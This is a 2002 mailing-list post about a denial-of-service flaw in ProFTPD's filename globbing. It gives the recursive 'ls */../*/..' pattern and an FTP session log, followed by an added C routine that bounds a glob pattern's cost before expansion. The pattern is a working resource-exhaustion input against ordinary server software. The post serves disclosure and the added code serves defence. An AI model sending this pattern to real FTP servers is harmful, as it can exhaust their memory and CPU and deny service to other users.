Vulnerability Development
mailing list archives
Re: proftp DoS in debian stable?
From: Felipe Franciosi <franciozzy () terra com br>
Date: Tue, 05 Mar 2002 13:32:14 -0300
`ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*` results
in 100% of the CPU and memory resources being consumed.
Can anyone confirm the same behaviour on their system?
Slackware 8.0 with kernel 2.2.19 and proftpd 1.2.4 running through
inetd says the following:
root () stonehenge:~# ftp 0
Connected to 0.
220 ProFTPD 1.2.4 Server (Paradoxo Networking) [stonehenge.paradoxo.org]
Name (0:ozzy): pp0010
331 Password required for pp0010.
Password:
230 Anonymous access granted, restrictions apply.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
226 Transfer complete.
ftp> quit
221 Goodbye.
And nothing happens.
Best Regards,
Felipe
--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Felipe Franciosi paradoxo networking
felipe () paradoxo org Brazil
http://www.paradoxo.org Porto Alegre - RS
Phone: (55)(51) 9806 7387 UIN - 33596050
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
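Added example, not part of the original post and not ProFTPD code: a pre-expansion cost check for the pattern discussed in this thread. Each wildcard component followed by `..` returns to the starting directory, so the number of paths a globber may visit grows as entries^wild; the function names, the per-directory entry count and the limit are assumptions chosen for illustration.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Pattern quoted in the post above. */
static const char POST_PATTERN[] =
    "*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*";
struct glob_cost { unsigned wild, dotdot; };

/* Count wildcard and ".." components, one '/'-separated piece at a time. */
struct glob_cost glob_cost_of(const char *p)
{
    struct glob_cost c = {0, 0};
    while (*p) {
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.')
            c.dotdot++;
        else if (memchr(p, '*', len) || memchr(p, '?', len) || memchr(p, '[', len))
            c.wild++;
        p += len;
        while (*p == '/') p++;   /* skip separators, including repeated ones */
    }
    return c;
}

/* Upper bound on paths visited if each directory holds at most `entries`
 * names: entries^wild, saturating at ULONG_MAX instead of overflowing. */
unsigned long glob_match_bound(const char *pattern, unsigned long entries)
{
    unsigned long bound = 1;
    unsigned i, wild = glob_cost_of(pattern).wild;
    for (i = 0; i < wild; i++) {
        if (entries != 0 && bound > ULONG_MAX / entries)
            return ULONG_MAX;
        bound *= entries;
    }
    return bound;
}

/* Hypothetical policy: refuse the pattern before any expansion is attempted. */
int glob_allowed(const char *pattern, unsigned long entries, unsigned long max_paths)
{
    return glob_match_bound(pattern, entries) <= max_paths;
}

int main(void)
{
    printf("allowed=%d\n", glob_allowed(POST_PATTERN, 100, 100000));
    return 0;
}
```

A check like this runs in time linear in the pattern length, so the request can be rejected before any directory is read or memory is allocated for matches.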